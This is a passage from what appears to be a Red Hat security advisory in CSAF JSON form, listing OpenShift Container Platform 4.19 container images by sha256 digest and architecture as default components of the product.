"product_reference": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64"
},
